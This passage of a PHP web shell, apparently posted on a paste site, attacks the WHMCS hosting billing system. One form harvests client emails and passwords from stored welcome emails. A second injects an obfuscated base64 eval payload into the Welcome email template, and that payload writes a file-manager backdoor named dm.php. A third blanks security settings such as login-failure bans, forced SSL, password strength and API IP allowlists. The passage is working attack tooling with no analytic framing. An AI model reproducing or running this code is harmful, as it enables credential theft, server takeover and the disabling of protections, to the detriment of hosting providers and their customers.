  1633. </table>
  1634. <br></form></center>
  1635.  
  1636. <?php
  1637. if(isset($_POST['plapon'])) {
  1638.  
  1639. $perawan = $_POST['anu1'];
  1640. $kimcil = $_POST['anu2'];
  1641. $janda = $_POST['anu3'];
  1642. $hotel = $_POST['anu4'];
  1643. function get_string_between($string, $start, $end){
  1644. $string = " ".$string;
  1645. $ini = strpos($string,$start);
  1646. if ($ini == 0) return "";
  1647. $ini += strlen($start);
  1648. $len = strpos($string,$end,$ini) - $ini;
  1649. return substr($string,$ini,$len);
  1650. }
  1651. @mysql_connect($perawan,$kimcil,$janda);
  1652. @mysql_select_db($hotel) or die ("Gagal Koneksi Ke Database");
  1653. $query="select subject,message from tblemails";
  1654. $result=mysql_query($query);
  1655. mysql_close();
  1656. $num=mysql_numrows($result);
  1657. $i=0;
  1658. while ($i < $num) {
  1659. $css =mysql_result($result,$i,"subject");echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  1660. <tr><th colspan='7'> <span class='b7'>O=:[ HOST ROOT ]:=O</span> </th></tr><tr>
  1661. <th align='center'><b>CLIENT EMAIL</b></th>
  1662. <th align='center'><b>CLIENT PASSWORD</b></th>
  1663. </tr>";
  1664.  
  1665.  
  1666. if(stristr($css,"Welcome")){
  1667. $s =mysql_result($result,$i,"message");
  1668. if(stristr($s,"Login Username: ") or stristr($s,"Email Address: ")){
  1669. $mail= get_string_between($s,"Login Username: ","<br />");
  1670. $m2 = get_string_between($s,"Email Address: ","<br />");
  1671. $pass = get_string_between($s,"Password: ","</p>");
  1672. print $mail.$m2.":".$pass."<br>";
  1673.  
  1674. echo "<tr>
  1675. <td align='center'>$mail.$m2.</td>
  1676. <td align='center'>".$pass."</td>
  1677. </tr>";
  1678. }
  1679. }
  1680. ++$i;
  1681. }
  1682. }  
  1683. echo "</table>";
  1684. }
  1685.  
  1686. if($_GET['whmcs']=="shell"){
  1687. set_time_limit(0);
  1688. ?>
  1689.  <p><br/><body>
  1690. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ INJECT </span> <span class="b8">SHELL ]:=O</span></b></nobr><br/><br/>
  1691. <p><form method="post">
  1692. <table border=1>
  1693. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu1" value="localhost"></td></tr>
  1694. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu2"></td></tr>
  1695. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu3"></td></tr>
  1696. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu4"></td></tr>
  1697. <tr><td align="center" colspan="2"> <textarea style='color:red;background-color:#000000' rows='10' cols='67'
  1698. name=shell>{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajROQ2cwS1BEOXdhSEFOQ21WeWNtOXlYM0psY0c5eWRHbHVaeWd3S1RzTkNpUnpZM0pwY0hSdVlXMWxJRDBnSkY5VFJWSldSVkpiSjFORFVrbFFWRjlPUVUxRkoxMDdEUW9rWm1sc1pXNWhiV1VnUFNBa1gxQlBVMVJiSW1acGJHVnVZVzFsSWwwN0RRcHBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKUGNHVnVJaWtOQ25zTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSbWFXeGxibUZ0WlNrcERRcDdEUW9rWm1sc1pXTnZiblJsYm5SeklEMGdhSFJ0YkdWdWRHbDBhV1Z6S0dacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NSbWFXeGxibUZ0WlNrcE93MEthV1lvSVNSbWFXeGxZMjl1ZEdWdWRITXBEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrUlhKeWIzSWdUbTkwYUdsdVp5QkdhV3hsUEM5bWIyNTBQaUk3RFFwOURRcGxiSE5sRFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1JtbHNaU0JrYjJWeklHNXZkQ0JsZUdsemRDRThMMlp2Ym5RK0lqc05DbjBKQ1EwS1pXeHpaU0JwWmlna1gxQlBVMVJiSW5OMVltMXBkQ0pkSUQwOUlDSkVaV3hsZEdVaUtRMEtldzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25zTkNtbG1LSFZ1YkdsdWF5Z2tabWxzWlc1aGJXVXBLUWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJSE4xWTJObGMzTm1kV3hzZVNCa1pXeGxkR1ZrSVR3dlptOXVkRDRpT3cwS1pXeHpaUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCa1pXeGxkR1VnWm1sc1pTRThMMlp2Ym5RK0lqc05DbjBOQ21Wc2MyVU5DaVJ6ZEdGMGRYTWdQU0FpUEdadmJuUWdabUZqWlQwblZtVnlaR0Z1WVNjZ2MzUjViR1U5SjJadmJuUXRjMmw2WlRvZ09IQjBKejVHYVd4bElHUnZaWE1nYm05MElHVjRhWE4wSVR3dlptOXVkRDRpT3cwS2ZRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pUWVhabElpa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0J6ZEhKcGNITnNZWE5vWlhNb2FIUnRiRjlsYm5ScGRIbGZaR1ZqYjJSbEtDUmZVRTlUVkZzaVkyOXVkR1Z1ZEhNaVhTa3BPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25WdWJHbHVheWdrWm1sc1pXNWhiV1VwT3cwS0pHaGhibVJzWlNBOUlHWnZjR1Z1S0NSbWFXeGxibUZ0WlN3Z0luY2lLVHNOQ21sbUtDRWthR0Z1Wkd4bEtRMEtKSE4wWVhSMWN5QTlJQ0k4Wm05dWRDQm1ZV05sUFNkV1pYSmtZVzVoSnlCemRIbHNaVDBuWm05dWRDMXphWHBsT2lBNGNIUW5Qa052ZFd4a0lHNXZkQ0J2Y0dWdUlHWnBiR1VnWm05eUlIZHlhWFJsSUdGalkyVnpjeUVnUEM5bWIyNTBQaUk3RFFwbGJITmxEUXA3RFFwcFppZ2habmR5YVhSbEtDUm9ZVzVrYkdVc0lDUm1hV3hsWTI5dWRHVnVkSE1wS1EwS0pITjBZWFIxY3lBOUlDUnpkR0YwZFhNdUlqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1EyOTFiR1FnYm05MElIZHlhWFJsSUhSdklHWnBiR1VoSUNoTllYbGlaU0I1YjNVZ1pHbGtiaWQwSUdWdWRHVnlJR0Z1ZVNCMFpYaDBQeWs4TDJadmJuUStJanNOQ21aamJHOXpaU2drYUdGdVpHeGxLVHNOQ24wTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCb2RHMXNaVzUwYVhScFpYTW9KR1pwYkdWamIyNTBaVzUwY3lrN0RRcDlEUXBsYkhObERRcDdEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrVG04Z1ptbHNaU0JzYjJGa1pXUWhQQzltYjI1MFBpSTdEUXA5RFFvL1BnMEtQSFJoWW14bElHSnZjbVJsY2owaU1DSWdZV3hwWjI0OUltTmxiblJsY2lJK1BIUnlQangwWkQ0OGRHRmliR1VnZDJsa2RHZzlJakV3TUNVaUlHSnZjbVJsY2owaU1DSStQSFJ5UGp4MFpENE5DanhtYjNKdElHMWxkR2h2WkQwaWNHOXpkQ0lnWVdOMGFXOXVQU0k4UDBWamFHOGdKSE5qY21sd2RHNWhiV1U3UHo0aVBnMEtQR2x1Y0hWMElITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2JtRnRaVDBpWm1sc1pXNWhiV1VpSUhSNWNHVTlJblJsZUhRaUlIWmhiSFZsUFNJOFAwVmphRzhnSkdacGJHVnVZVzFsT3o4K0lpQnphWHBsUFNJM01pSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCemRIbHNaVDBpWTI5c2IzSTZiR2x0WlR0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lNd01EQXdNREFpSUc1aGJXVTlJbk4xWW0xcGRDSWdkbUZzZFdVOUlrOXdaVzRpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdjM1I1YkdVOUltTnZiRzl5T214cGJXVTdZbUZqYTJkeWIzVnVaQzFqYjJ4dmNqb2pNREF3TURBd0lpQnVZVzFsUFNKemRXSnRhWFFpSUhaaGJIVmxQU0pFWld4bGRHVWlQand2ZEdRK1BDOTBjajQ4TDNSaFlteGxQZzBLUEdadmJuUWdabUZqWlQwaVZtVnlaR0Z1WVNJZ2MzUjViR1U5SW1admJuUXRjMmw2WlRvZ01URndkQ0krRFFvOGRHVjRkR0Z5WldFZ2JtRnRaVDBpWTI5dWRHVnVkSE1pSUhOMGVXeGxQU0pqYjJ4dmNqcHNhVzFsTzJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpBd01EQXdNQ0lnWTI5c2N6MGlOekFpSUhKdmQzTTlJakkxSWo0TkNqdy9SV05vYnlBa1ptbHNaV052Ym5SbGJuUnpPejgrUEM5MFpYaDBZWEpsWVQ0OEwyWnZiblErUEdKeVBnMEtQR2x1Y0hWMElIUjVjR1U5SW5OMVltMXBkQ0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSnpkV0p0YVhRaUlIWmhiSFZsUFNKVFlYWmxJajROQ2p4cGJuQjFkQ0IwZVhCbFBTSnlaWE5sZENJZ2MzUjViR1U5SW1OdmJHOXlPbXhwYldVN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak1EQXdNREF3SWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZzBLUEhBK0RRbzhhRE0rWDFWUVRFOUJSQ0JHU1V4Rlh6eG9NejROQ2cwS1BEOXdhSEFOQ2cwS1pXTm9ieUFuUEdadmNtMGdZV04wYVc5dVBTSWlJRzFsZEdodlpEMGljRzl6ZENJZ1pXNWpkSGx3WlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlTSWdibUZ0WlQwaWRYQnNiMkZrWlhJaUlHbGtQU0oxY0d4dllXUmxjaUkrSnpzTkNnMEtaV05vYnlBblVFRlVTQ0JVUVZKSFJWUWdPaUE4YVc1d2RYUWdibUZ0WlQwaWRYQnNiMkZrZEc4aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpZEdWNGRDSWdjMmw2WlQwaU5UQWlJSFpoYkhWbFBTSW5MbWRsZEdOM1pDZ3BMaWNpUGp4aWNpQXZQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSm1hV3hsSWlCemFYcGxQU0l6TUNJK1BHbHVjSFYwSUc1aGJXVTlJbDkxY0d3aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpYzNWaWJXbDBJaUJwWkQwaVgzVndiQ0lnZG1Gc2RXVTlJbFZ3Ykc5aFpDSStQQzltYjNKdFBpYzdEUXBwWmlnZ0pGOVFUMU5VV3lkZmRYQnNKMTBnUFQwZ0lsVndiRzloWkNJZ0tTQjdEUXBwWmloQVkyOXdlU2drWDBaSlRFVlRXeWRtYVd4bEoxMWJKM1J0Y0Y5dVlXMWxKMTBzSUNSZlVFOVRWRnNuZFhCc2IyRmtkRzhuWFM0bkx5Y3VKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdEUW9OQ21WamFHOGdKenhtYjI1MElHTnZiRzl5UFNKc2FXMWxJajViSzEwZ1ZYQnNiMkZrSUZOMWEzTmxjeUE2ZGlBOFluSXZQaUJiSzEwZ0p5NGtYMUJQVTFSYkozVndiRzloWkhSdkoxMHVJaThpTGlSZlJrbE1SVk5iSjJacGJHVW5YVnNuYm1GdFpTZGRPdzBLZlNCbGJITmxJSHNOQ21WamFHOGdKMXQrWFNCVmNHeHZZV1FnUm1GcGJHVmtJRlJmVkNCYmZsMDhMMlp2Ym5RK1BHSnlQaWM3RFFwOUlIME5DajgrRFFvPScpOw0KDQokZm9wZW4gPSBmb3BlbiAoJ2RtLnBocCcsJ3cnKTsNCiR3cml0ZSAgPSBmd3JpdGUoJGZvcGVuICwgJGMwZGUpOw=='));{/php}</textarea>
  1699. </td></tr>
  1700. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  1701. </table>
  1702. <br>
  1703. </form>
  1704. </center>
  1705. <?php
  1706. if(isset($_POST['plapon'])) {
  1707. $anu1 = $_POST['anu1'];
  1708. $anu2 = $_POST['anu2'];
  1709. $anu3 = $_POST['anu3'];
  1710. $anu4 = $_POST['anu4'];
  1711. @mysql_connect($anu1,$anu2,$anu3);
  1712. @mysql_select_db($anu4);
  1713. $shell=str_replace("'","'",$shell);
  1714. $gosok_shell = $_POST['shell'];
  1715. $colok = "UPDATE tblemailtemplates SET message ='".$gosok_shell."' WHERE subject ='Welcome'";
  1716. $udah_ganteng=@mysql_query($colok);if($udah_ganteng)
  1717. {
  1718. echo "<font color='lime'>SUKSES BOS  GANTENG :P</font>";
  1719. }
  1720. }
  1721. }
  1722.  
  1723.  
  1724.  
  1725. if($_GET['whmcs']=="token"){
  1726. set_time_limit(0);
  1727. ?>
  1728. <p><br/><body>
  1729. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ BYPASS </span> <span class="b8">TOKEN ]:=O</span></b></nobr><br/><br/>
  1730. <p><form method="post">
  1731. <table border=1>
  1732. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
  1733. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
  1734. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
  1735. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
  1736. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  1737. </table>
  1738. <br>
  1739. </FORM>
  1740. </center>
  1741. <?php
  1742. if(isset($_POST['plapon'])) {
  1743.  
  1744. $anu1 = $_POST['anu1'];
  1745. $anu2 = $_POST['anu2'];
  1746. $anu3 = $_POST['anu3'];
  1747. $anu4 = $_POST['anu4'];
  1748. @mysql_connect($anu1,$anu2,$anu3);
  1749. @mysql_select_db($anu4);
  1750.  
  1751. $crot1 = "UPDATE tblconfiguration SET value='' WHERE setting='InvalidLoginBanLength'";
  1752. $crot2 = "UPDATE tblconfiguration SET value='' WHERE setting='AdminForceSSL'";
  1753. $crot3 = "UPDATE tblconfiguration SET value='' WHERE setting='RequiredPWStrength'";
  1754. $crot4 = "UPDATE tblconfiguration SET value='' WHERE setting='MaintenanceMode'";
  1755. $crot5 = "UPDATE tblconfiguration SET value='' WHERE setting='APIAllowedIPs'";
  1756. $crot6 = "UPDATE tblconfiguration SET value='' WHERE setting='LoginFailures'";
  1757. $crot7 = "UPDATE tblconfiguration SET value='' WHERE setting='InstanceID'";
  1758. $crot8 = "UPDATE tblconfiguration SET value='' WHERE setting='WhitelistedIPs'";
  1759. $crot9 = "UPDATE tblconfiguration SET value='' WHERE setting='ToggleInfoPopup'";$crot10 = "UPDATE tblconfiguration SET value='' WHERE setting='token_namespaces'";
  1760.  
  1761. $udah_ganteng=@mysql_query($crot1);
  1762. $udah_ganteng=@mysql_query($crot2);
  1763. $udah_ganteng=@mysql_query($crot3);
  1764. $udah_ganteng=@mysql_query($crot4);
  1765. $udah_ganteng=@mysql_query($crot5);
  1766. $udah_ganteng=@mysql_query($crot6);
  1767. $udah_ganteng=@mysql_query($crot7);
  1768. $udah_ganteng=@mysql_query($crot8);
  1769. $udah_ganteng=@mysql_query($crot9);
  1770. $udah_ganteng=@mysql_query($crot10);
  1771.  
  1772. if($udah_ganteng)
  1773. {
  1774. echo "<font color='lime'>SUKSES BOS  GANTENG :P</font>";
  1775. }
  1776. }
  1777. }
  1778.  
  1779.  
  1780. echo'<br><div style="background:blue;margin:0px;padding:0px;text-align:center;color:black;">
  1781. <font color=silver>&copy; </font><b><i>AZZATSSINS CYBERSERKERS</i></b>
  1782. </div>';
  1783.  ?>
Add Comment
Please, Sign In to add comment